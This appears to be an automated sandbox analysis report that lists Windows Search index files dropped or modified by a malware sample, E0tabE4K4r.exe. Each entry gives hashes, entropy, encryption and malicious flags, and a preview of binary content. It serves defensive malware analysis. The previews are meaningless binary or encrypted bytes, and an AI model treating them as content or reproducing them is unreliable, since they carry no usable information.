                                                                                                                                                  Preview:Ej..Dmb.]z4Wq..8....z...p;..& K.7..0@.......mh`.S.{.N:I..,p)-...u......z.q.....vs....n....<O$..J....D.,.C...Vd?T.O.U........$....g..Y..F.b......buSj..........y...}]J=.1.'..Z..Gq2%C6.J..W`x`-...hq.M>H...b0..?...`=....<..X....].d..]E\;.R;5...Z.2.h.w.6.....9].z.xy...ZK.....2.0..T.C2...e.uHd.wzO..>..W......8..p.....&J...qI\3.....n.b....O.O.m..i...^..-v...l1..`...KwF.J.aG.<4.`.....Q.o\3.z.L.e..Q..MJ.:#...$..o:.V..M.@......Hy_.....w".f5.<Y.....@.,^....a....{.D...j.).2H.<@...+W.m...;.|.3G..........O_{.. .-KU./...wAJ.f.8&z.6.........H.....7.Sr..1...rx...MP|.g......A..^l0X.+...c..n`....N!~2..n?^...K..b......J..]......FF........%.7.X..1...z..|.Iz.9}e........F..'kZ.V.....?...D..#...CU..%....}..lL^XH.zk.o...."6-.o.s.\.............d2.....g...z6......).:......d.t.P...+C.......p...r.,.An.m|.9..t..\.y=WcmX%0...}...`.7B5..C.^..g..il.......|?~.w.<......B+..g.....i...P.56...>@..T}<.C....CD..s..2.O1K....}A.d`n....*o..u.EMw.8V.`.(..u....'\...G.K.<.\...ZIxD.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d211107-64fd-418b-bef3-55d5ac74a5cc}\0.0.filtertrie.intermediate.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):37506
                                                                                                                                                  Entropy (8bit):7.9952238911110864
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:eCrXq64rAP4quXsgF2d2fTRWwRhmEyg40tzpMcwtQocELoqdAp0xf+rlQ/0ki:egXqBAJu8g0d+hqgttzOcwFcEsqo0E6m
                                                                                                                                                  MD5:CAD5AC661882FAA6CF0041788469BE8C
                                                                                                                                                  SHA1:AFB812EAB7AE128ED216175BFA89D0678DBFF5EB
                                                                                                                                                  SHA-256:F6AD45419F878BC5241CB645B4CCB795DC2F7B5395F25E88E787DE5B9E88BC60
                                                                                                                                                  SHA-512:2CE382B2A86997BB45C62091E2A49C1043F2F29A8D8FCA89623AB27CDE5AEFD66A9467C74DC7A61FCB15329D1A5A9D3D681DA4965CC7C3ABF5BE169081E638D3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0.0....5..S..G...:.....b.T.V.".~5.d.i._-................M...#.V!.#U...H[J.fK.Pm...Y?.(r.f...g#..$.F..!...?*U...[.quIfvcv...f....sP....hu...v......K.\.z.~s1<.......B...)...J.R.\.......'.4..!Ee....7....@.._.m..x..R-....Q...............I-C.^..]yD:I.7.....~%6;...JM.qf.hQ.......L....>mx.i.tKm.z..~K..Y.-.uS.....?..5...e.....h......sp.......84..f.A.IV.=CE....dKC)$z.tk..a.E6...S....2.-..=TP'..&..8y.k.......Q..P..}}Q\.<......[<...y....!.$Nc......8...%.....x...n{.~.;J.}.6c.;..+.i/...*..U.?.Z.y.4....7l.Q'.@..E...I..f......./........be<.A..?:..,.0Z.l'z....m..t.B[.h%.Z..^.....8....&.,.ZE...U.9...A\2.*._.j...U.=1.P@.4s....Q.hk...h$..:.n}.....C..J.".5...J.S.Q.#....A(.mw....c.)S..> kl8yv\;...y......5..;G..j"...9:..c..2w......5....w......o..h.zF.9...T1.-.A....{.K.a=.9.X..H5.:;(.y_..#.b3.1..i.....7...^..2y...E...V.\.....Ya.2e..x..<..]$.l.;>.o.......q....Kh...}8.15/..Q.....{0.1k[..d..2L.;.4..a...97../>qi0..`....+cj..R2.M..... 2.jv1Wn\M8.+.'<.....r....M_p.{..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d211107-64fd-418b-bef3-55d5ac74a5cc}\Apps.ft

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):50409
                                                                                                                                                  Entropy (8bit):7.996146907657911
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:zaKhSPZEEBYuRqhwXsiS2ApsjaGef21fDmpNwwUCo3uiZ+lna1jm9j1B:ABEYZcwyVGO2YpNwwUC2K12jmzB
                                                                                                                                                  MD5:E54D0D842F9BBCFAD668E40FA63DB824
                                                                                                                                                  SHA1:B8BD48A6DF12831A6BAFA8DB4A166F0198217408
                                                                                                                                                  SHA-256:8BEB18E0160217E137E893EBD3071570B7192134DC56CCF815151A505981E764
                                                                                                                                                  SHA-512:17ED2D826A723AB5586C31A83444EB1200BA9BB1C343F28B8F1F17FE8417FFE0D33B53C7F481EB258728D26ED39E6100C1F5ED43E2DBAE318ED0082348E3DEA7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.....v>......U.n'..4@......a.....j.[..@.|...#..H.....F&C....[.....f..0>.....P.I...........2+y,..WC...zB=...#uW.........T....U=.K..}.{+..."...j.j@ .LP.S..H.8.w......V...i...C..(.g........... \..pn..V&...k......z........@5....<G....`E.nu.,N(..AG....E.Q:....{._.w0]K....{.M...|...v3....bD/.|.....j..yf.q.e3&'...]V.P...CN..A.._..k............x...s....Y..g...\\....oo...L[l.........R..O.y<p...^O.?}gwN..-.K.F.,...I.......X.b5._.g.o..5/.`....=[...l...{..S..J.y......#...`.]/.D.q_u.......!!.Y...[...k..5~..x.@..A.#.......XM....[..;yS...,..w...aL...%p.,.k.H3...fJ.[b..x6A....Q%7..o-?t....nJ...r.!UYU..{.z1H...Gpg..xE.:s.b.O.=..i...F#.79.X..^...W.$...H.}.3...9..C..e.}.:p.....5\S..Jy...s.%'t.........H...I.^%...!.Sk?..?.v...Rr....a_.m..Z4.N..1......I./..D.u).r..S....^...4..Y.Y].....&GQ.ph..CHz......M.06.'..i....@....../.^.....~.\.....$.......+.e...7.'...@..\."..[......p.}....Q.*..'.....Jr..!.t..I{v..5s.k..zb>{.iHP........V...cNLTX.A.....t...uI.8...*+.n.i....5y^".Y

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d211107-64fd-418b-bef3-55d5ac74a5cc}\Apps.index

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1124845
                                                                                                                                                  Entropy (8bit):6.544731096326951
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:ht6mlziLADaZLjE1Bx7BefoQaWFxAm8DStxmthXv3zrLoE1Bx7BefoQaWFxAm8D5:6cmuYfoyFxz8GfoLr7YfoyFxz8G84j8
                                                                                                                                                  MD5:0EA4B3176259CF578381CAC32F5C8815
                                                                                                                                                  SHA1:699208E52731D436A6A07D10D6112FBF8DF257BB
                                                                                                                                                  SHA-256:00D58861121D7BFBF44029D35621049C314A097A581A69ABC978B7049D3E0A6C
                                                                                                                                                  SHA-512:F3B8E17AB93C4AD02AABE045CE5B89D43E1E99ED3FB2CDA214B048CF8EBCB835300AC5FE39F431DAF7CAD82AAB2A279EA739DFBC39C62E79ED8BFC142B604481
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Ej..DC....QP..syi....*.....C.L....L.8[Cl..[....nS{.E....r)....2...x.V...U0..Y....aJS04~.}. .k..).`.sX.G..'.. &\......M.D..d6.._..#x.T.AV.w<.3.0.........a..P{..Z.....1`M..r.NI.I.-&kJ.6.F..Z......Q.E...1:..J.Bw..g7..:r.....:9...F..O~...Y.)..`.'..K..5..p..D-{.0.|F..L.D....?$.0.U......}..~....\...l........1...M6......"..@......`.xO.3.*.^...o..Qz......k.Xf.(..l...t'&...A..P........Q.&6[.).x.....gR.wPG.....$=.....G.t9t.B....{.a..Z..0....zf....DW'.r,..o.B....P........m.v.F..$...wJ.....$...D..st........J~...X...MB2o...g...G..g../N..FZ.k....{..r..>.]..........?..aw.O..g7..&.?...{.XG......8.~.^......0................n..j...Y.....Q.#nk.VWn={.p.j....W..r......a...7Q.....[:..NU.^.RFK-..%.s......g.Mm.;..>/..{@...T.b.md.6C...0s.0.~W.....Z..G.]./...;q|..hmH.w-..,..v.&.*86&..x.(.c.M.^.#u.wB.;...h...~..E .m....O......#.T..C..v....2.v.P!uR....yT.?..`e..m).......V..S......Q.q[.H..U....7.'.i.so2.....'."..Q.p*.=.....}.<h..... .t.-..b..{..w\ U#U..W...ly.hT

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ae68f974-166e-4f91-b176-9782057fd3db}\0.0.filtertrie.intermediate.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):37506
                                                                                                                                                  Entropy (8bit):7.995530034768724
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:hdJ/kQ68sssfAHFlofc7qKWNjo4WdLYwfKSnng+fA3pFCIkkzF5s6cNrXi:hdJsQ68fsfOIJDNjedLrngqA3pAIkkJ1
                                                                                                                                                  MD5:17BB5A267D093B41F3DAEAE814852335
                                                                                                                                                  SHA1:6C6FD7E2F6744E91533EE9F0DE7B991B4F0AE726
                                                                                                                                                  SHA-256:CCAE63ADD2A7B510CB38B62CCC3C4C25589D204CCDB9F6CF2DE306CE4011AA42
                                                                                                                                                  SHA-512:FE2F5E1CF4434361E9B7338C58D458994A30731994A2265636DF0C99896600471BA5CFD7E0C97739CB213C0C4E47B7F3DBD05086A420D856EA0837EA58A789BC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0.0.._'4=..H...w.o.k...e.k..}.@.tF..]..1-.......)..........x.3.V`2y.K...p'...,s.u?".J.:.N..j.....d>g><B.M.r..!..lAWBH#+.LA....n....i.Z..i6NE..{[.v.q?.....v.a..).G,....g.".P#.,.K..e...\...>.6.(.eR..j#......5G%.'..m..`.l7).j{m..2W.c...!1.8.Q.X.g...S.x.#.9.....5'.Eo....^..;zn.0N..z....\RI...4.M.U:....UTD4..^..Z.#.miz!..kp..a.5T......e.m.@h<...p.Qc`...o.U.$.....<.w.B.,.87B.._"yhtz..,...........bE.H&|....4..k.9..^..S..L.......$...gJ....#E.G...5L.(..e.......G...........vPb.5..Q_..Z.~....X.c}px.Lr.6..:.}.N,.....f..|.(...!$'....I.._r....S.../!...t...L"<.@...O.p.U.V.sEa.axY".....h.#....mt.A1..?[.XGpA...^.:I'i._1.x...P.H.S2H._...}..J...h.(`f..{......]J..^..o.V...-'i.i...D......A.X.1A,.F..3.yb......!...{.c...%....*..J.......\F....].....8...P.]P....Of.1.o..8[Kpn...5bMX......rc....H..E."...Ks.z.b...X.........&A.9.E_..9....{uV.W..I.A\.&.&...<K.E9..l-...E..>bk.y........7V..(L@T...y....t.;.w........7F....Q....N.)...({...M.L...]..~....LSS`.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ae68f974-166e-4f91-b176-9782057fd3db}\Apps.ft

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):50409
                                                                                                                                                  Entropy (8bit):7.995866224209962
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:ichB5yo+KFHOY6A/MTpt9CA/LKjTdU7RjVReFSkex5KTYlzPr03dY+MOkVF9Wq:icBy6HJy9C9KZV/ke3Tr0tYXP
                                                                                                                                                  MD5:010425040D106FD7C6E1807AE24781AA
                                                                                                                                                  SHA1:A0EE55326A0976D2F3F25EF259BEAB425707BD4B
                                                                                                                                                  SHA-256:2772CEE74056FCD1A5942B1F17336ED9258A0BF226FFD6E6763DC4A4DF0057F5
                                                                                                                                                  SHA-512:FF61A97D6D568B73AFF6647B76AB97A33FE6881AB04FDEEB0F97D7D4FBDC4FD35810F3D5EA8C0B7D35E49A6958BFA238DD184E2834525839610D4CB661A651D7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.....4-...S.%.S.n2..p.......F...C.*/.:...(.%..:.K.)~.....QL)..M.....?c.*0m~...R...:V...4T.6o.gl.....;.....&H...ee..d..q...J..Q..).yU.x.{...a\..&.gX.........%......d...._*8..I.2..%T$........................i....H..f. y.X.....m..mJ.....o@..|.......A..|.DV......K...0%...7.@.0.......Cy3.uf.@9..Z....#G}.[4wV...1Ny..k...> .PP.j:.4.u!".J.jM....d.Xp...|X'.S...CZ.K...7.%....y.....<..$w......PP.G..o.y)..../q...@b.N..j.xe...^.8T.........l.,......:....R..S...v ..R..[7....*......d........>v.H...... .4..E.S....h....c..].].w.s..1@..nR..../..k..>]......./.....dD..EI'.$p4.y$@.....V[qF.,..w.......d1lSu..HOv..#........,......].n[.c.Kq..@c,S..E..hw.Z.i.VOs..D...."/.....b.1.......z..`...{...')BE....UW..D..hq.V....s..........F....%../UZ.........nn_,.qW...SI...}8.;'?FZ2N.,.5..+*..l.Us..6....C..N6D..Ws.*.&.l..cm.:T1...j..,.*..x......G......rr\4.T....0...0.....K9.l..kUh..O...A...t...Z[.h4]*4..k.+....La.b..$v.U..$..`.N..l..j.N...p&.H#`...G3...[c....oz_B...L....Y".2

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ae68f974-166e-4f91-b176-9782057fd3db}\Apps.index

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1124845
                                                                                                                                                  Entropy (8bit):6.544494130303705
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:mcyuR6jNiTapYfoyFxz8GfoLr7YfoyFxz8G84jr:JAwTHf1xz8GfMwf1xz8Gr
                                                                                                                                                  MD5:7B8F2AAF12B5D84257ACA1A5DFB701A5
                                                                                                                                                  SHA1:FC2107C8F9EF46379F020C102D2EBD0737233E5B
                                                                                                                                                  SHA-256:65347E210350EFD848B93BBDF7A03CD386F8310AFDB3318450012AE351297493
                                                                                                                                                  SHA-512:E6112A8CA117D72D8B74E8122D7ADBA96EF6C6E5B8241D470E34629A3164CE82F0D9951EBE887C88C2A1C0B714B7E3DDE84B54B4342A8C3CC6A51AAB803F1670
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Ej..D."....q@..0.O....U9#.`......9Y.E...u..F..i....g..pK.B&). X..J.....3....`......".W...Y...p....j.Ys.k...T..C.F.......x5Q......&..n.>....B.~^...k..|.&.....}N.D..8.....o.~\R.../v.../7...=.2....)P)..3.V........f.......~.e.........4._...HhvX8_.%..r];sD=2.#...J....q5._1.......~.z.}.>e......<.......3..Y8a B..<fx}1G.=K...C.[rEY....D.Y.).7P......Ub#Z .@XX..f\0.OV.zH7"...y.......o..Q....7:}T....W.q."..s....2.C{..f}.N.\P.Xo..%.C.Uu."}.g.q.CP.....|......5."(.).K..e%a1..5.m:..xP...\.4.h.}.Dy$...-..H....v}..B..H`G.9$5....g.nwM[ ....59N4..GN..cr..i....[.pdS:P.........$@w...Cv.4.. ...@.......t..-..oN..g..~bx.,...h\.....N.]"f.....v3.).......y.j...p)..:..|=...-..j..1...x..;..x.._.!...W8.<..{...+.r.rz...p..?3..J.]oG.....D'.......=..1"gH...iR#H..]...g.b.G.]R..%@...z..i..bc]7L..lu..r.Z.F....9..i..s&..9tnv...[.4...K1...=..j.m..By.X.. ..O..Q...6....q.t.._8...u[C.."..6...oQ.(.I...4.$6.+.9}...\..`G6..P..I.....*..ya.+...,...`Ji.>U..0.....`iw....".......=.J...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\apps.csg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):778
                                                                                                                                                  Entropy (8bit):7.721894957749543
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cCaE75NS98Rvz7FYf4zk9ckP8zyXCdmPakZ2bD:cCh59kUkynd9kyD
                                                                                                                                                  MD5:7F91E3C6559AF16C84DFEA064CAC6AE9
                                                                                                                                                  SHA1:A4697C722C0D2EFCDB107718B941122A9F14195E
                                                                                                                                                  SHA-256:9848E5B9E0DA076AA43DAF5D3C5C706BE34DE1AE9ECA4F70BF470FE76BA436CE
                                                                                                                                                  SHA-512:6D51AA5A825D56F03FD74B5A1460DD39F557EBA2D957E7A2C95EE7FF5082A402E14E5F2608B02590A4803C93CE0A909C5E3AF8708463C3D56903C9443ABC3805
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......e..R%.U....^.z=z...%..U.... b..p.....2..J...?...b..^(sC+8........j.......p..3...3@tq.8MN...bL...../,N..%._z...2...W..N.".......5.3.$.5.>j....U.mWU..E..{.S.....x@A.C..gf. ...........B....)..|.#.5...2`{...8.J.&....2 .".6...zV!...:.;+.B....?n.j....6afm...C....*...s.......6..".T.p.9....*...M.w8./...r.h.J./(..'.p*......@.W.....]e...M0..'.B..;nZ.>`.v....!.1e[I`V`....Z.3..=..#.U......p..Z..]b5_,:.I9.8.*s.1#}.Qe.....?i..l..../e..+... ..0r..9....0=....A.B.../.&.........q.....CB][..8/.?:n...ZDQ<..6. ...E.$y........f2..2GV..[....:s......>..v..(.PFL......O.a$...q.KN.w.n.FJ`.\...k....h...3.p...n..f..l,#.Ld..nQ.b.$.O >&/vL...R..C.Y.X.y.rn..g.\"........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\apps.schema

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):484
                                                                                                                                                  Entropy (8bit):7.56172693258663
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:jBbAsBueMbXnT0xYAJTrbeJJY2ysdGWAJP2SUdNcii9a:jBbAGuvjTMYSTrm/Ip12bD
                                                                                                                                                  MD5:E5F2FC1571059A1A6AD558BAB51C1B95
                                                                                                                                                  SHA1:E588566F7615AC5ED7CBD3B665422CDEDB8912B8
                                                                                                                                                  SHA-256:2AA39EB5F573ECE25BDBF8A3CA2BF2EEEC46C0266E12A92DF83B1E82CA433A18
                                                                                                                                                  SHA-512:7334643655E75275C4CCE539458599AB4822D1A7077D2D7D8400C2BDF0016B77AA3A586222B54C30ACEB57C3A66DA40E194482AF53AE4B54770375BDEC8C5045
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Windo.8..:......=.G/....|.q%.j.S...Sy.(...0!..Yj....1g........o..A(Y.5.Mv?.s.`<V....X..........f.U..q.QL.<qo.....H.M..d..h.... .".Us....#.>2.\...p....O.,.I....*..q..J...K...7 ..G.....f.._QxI.^..f...V....[......@..~......)..f ....f...\._nv..XSl..\...C._.....`@@....s.....[.Q$....0.y...X..[......|."..N.|.....fz...B..nq'.V.9........T.Y.0.n. .X?....E.q/h...w.Q.0.XN..4;..."U.p.Z..O......l.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\appsconversions.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426236
                                                                                                                                                  Entropy (8bit):5.415830114813145
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:gFm4iLS85Mjdr9yEKzC79ufKZDXkmn63mlDEyjMD:gFm4aMVD4r
                                                                                                                                                  MD5:1CC6422E2E414AE60BA264ABA669CD18
                                                                                                                                                  SHA1:5CEADF72D08BD297B6622B74F4A6EA1B2C38F189
                                                                                                                                                  SHA-256:7AC53427D7975FA73747E2EE8FCE05FCD085AF5E82D34C85163F90E635267BC7
                                                                                                                                                  SHA-512:917356DCE962054AA8E619AB80EB84BCDA736A1832D257A8E439863B16D613ACF4EFC176CD6B038E2A412893BB35A21462D3B18314654ED313E02202963EBF12
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:marke.P..6...5...d..?..R....3i...!Z.wD....P.@.........Y.q.(/..>{...i....y.\..0e..v..dM.(.......P.?....z....t.....[..Z.[p.^%.....G.TP.<6...c..)|..D.2..4.*q.Ivj.....re.6]|M...\..2...Wk.....I.4...N..u....zi..G..m..B-.$.8..,....=i.$R..W.&8.}..K'.H.S#..W.&.........u.6s...33tN!.........?..s.v_).....h.Z....'. .N...."......<a.C[.z.?D....Uk.h.$..6f..~ B.S..2..qP%..v.:..}..bc.z.E..DW]....y.O...m...L...Kl.:X[......-?".....{.SM..B.z. .t...,...Ne...&{k.`[..gu.........6..%...X.CBv.r.......pnPg......o...../..[o$.iL.af.4.Fq.}.)..9ld...d....D.Z.]..@...^.1O?f......_U2.N3...OL....AUGT.HjFx..o.3.jI.sd...0......J...<v....U.Qv......i..l.o.....8;..h....w^.,....C.|...c.0.wx\....l.(O.s[.d.Y.`]..o....L.?%!$6..IF..n....D...q...6.m....S..T.....8...P......n.DlV...^q...t.F].Q...n;Vr/Us.O......:n:.Y..q.....#*...%.txl.i|..p....-.'.j....L.Mzs..>.K.9.W.}..`.k..t..iP.n.X.3..}cM)j.9.o....)....<.g&.`..."....p@?..yi..M.........Z+...,...../.......?.e.nf....Q.....E..}/..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\appsglobals.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):352062
                                                                                                                                                  Entropy (8bit):7.226833516549755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:WTD+YmhHMrnAkWWMkik75HV9940w41YL6hB5PsqCf4:WddX2y519Nmqi4
                                                                                                                                                  MD5:846F6BCCC93AA0EF30E2AB9C00514896
                                                                                                                                                  SHA1:9516365CB3C7B312EA3749E4180E959EA831AE51
                                                                                                                                                  SHA-256:614121DD8034EC8E73A20F28162DC3552A2C2B45CA501F3F36F37CEE92CAA9F7
                                                                                                                                                  SHA-512:FB706BB9F38B106232D57DB57E7F69EA8BB3430EF152EED09D23518B0AE5BCFF6FFF4E19D74F154502F4916B18FE9F6BE8B7B075A2EB8D8B3CDE8AF8BA01C01B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:{1AC1._h....w.5.:.:....n..m.Z.v|6......3Q.....T.p.S..Wu..9.o.....phZx....4.C.oK...4].Q.b[...Ek...(.B....n.j.....14.V>....".2]%f5P...C..81z..T.........4`.wO..b......!.?;..6.LU4Z$..@,.}...^.G.....M.A....21.8......e.B.e.R.^..@....w.g7...Z.#...M....Z,.ih..k@.....m6$.c#.'..2.>..].....:a...."..o7..#...G5.{..Mx.w.w...6..1.BqX].T..L.w.1#(....h..|9...H....pX....."..........h!..=q./.......u...?......lsNt..{..U.%V.;~...{|YE...d.~.# M.3....?....^xX..U........=j._XO.n.Y..[jU..$.L.wX@.J3...=z..,F.aO.\......r..,.s".b......:..4......l...9..]a.G.R.V-.o.......B$.....~A0.3..l./...(.A....:.f]....U^.........P..>.2<..)0._.......;.+.K.AHf...........#..Vw.....P......N}.,O....0.:$..7J..*V..(...t..#...:\..7......?eW..U.V..p..\......C..".#x..3......^..]V.p.4..BB...-7..i`.X...~X9c. .'.av.f.dq.+.I..D.."...=v..ef.j/&..G".m..!......>o.....s.@Y4.'...R./..\5A..X.2.g9.V.~....d..Y...M....g.....yA.D.;z...3.....k.....Y[.b. ...(.!.F9e..Qr.H.....CN...1.V.....ni@.....2..a0. 5.J...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\appssynonyms.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):243828
                                                                                                                                                  Entropy (8bit):7.512567647784498
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:Ci3v8JqAmQWsuPoezWRiRgp7hbZWbCyXFePKn:vRAm3sTezJRgp7zW2yj
                                                                                                                                                  MD5:0AD1DFD84E6E211448DE34E9A6DD8377
                                                                                                                                                  SHA1:3A58E438F6ABF65B84870B0784A61A07D40A08B6
                                                                                                                                                  SHA-256:6259E5FD73BB962D383C552F56CBC90CA85482BB5DF0258EC6FC71A559B96D0C
                                                                                                                                                  SHA-512:1984F5921F94D0F0C157E579F3AA65B557483C60F56D3A71055C8F9C340925798EAEE855E56C3A483E828C5C76E6AD02A7A924D37CEE3CBF3339F9456352107A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:*|.*|..y.....GV[<.....AB..W.h...Y.9..[.`.r..g.j..Ky.j...e!Q.f.gQ...D..$[..k..i..(....,..3.g....X@|.".a...e."..hi...x....Lx..$}2.r...m......%...r...d.]3.......C.J.......]'.yD.>r..?*.G..h/'7....[?`..7...t.H...hq..y.t)o..x...h?.'.8....I~;...g..v.`......2$.U..M_..:Tv.nd..$`....{]..q#...E.......lp......^....g..b....v`.]a,U.P....yE.......O..Q...Z.1..`....G..E....)K._.yC.B....%..$[.qX.._...0........x..PN..hw.@....`.O-Z:..@........v.3=.w..%........u<....3z"[....a.."#a....[..Xps...j..^.>.r...?!..k......g...=..A.}.~....._...v]..h.[...,...'..Z.......8a....^.....U.}`...)^\Q.2...{."1....\.._..W.nK......W..7.4.......I.FA)....S..*Q.....f..uS...!c..p)8..8.NY. }......>.|../..._e.M....y!..#.y......l1...k<.\h.$3p..e;..$...q.s...O..:..D.....2..Z..QX.G.5,0.A..v.{..H3Ta....4.W|P,.9.... ._J......d.-.....q....^.t..$..Z.(.0Sz.k<.6h.`.d.x...!T..,t.......?..K.f^3..j.n.(.D.U...uL.x.)"er"Pf.s..r.. ..m..;H".L.Y..r._U.m....).s..uIuT6.G.b.-K...f.8+......:'.-.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settings.csg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):788
                                                                                                                                                  Entropy (8bit):7.7387957589693395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cDCaF8dD0xXvKM8wo1rD93hYH6eR1muA2bD:xU8dMfKvwo1rD9xY/zD
                                                                                                                                                  MD5:CDAB7757DE03B0C5EA5F33EAF2A0286B
                                                                                                                                                  SHA1:20B9F43339821B13862E31E6B7E31D7E0027EB71
                                                                                                                                                  SHA-256:A138D9A9DC2DF2B5E7CBFE60C9110BABAF50F6141828D8791280790D37A3C635
                                                                                                                                                  SHA-512:37C0CD26038383373857953E23E7FAF5BE39DDB142555E2359BF92F678240C07779CCEEF072A76A860D44813ED2FD0E7A8307E4E55CD6C91E5E4909F605056DD
                                                                                                                                                  Malicious:false
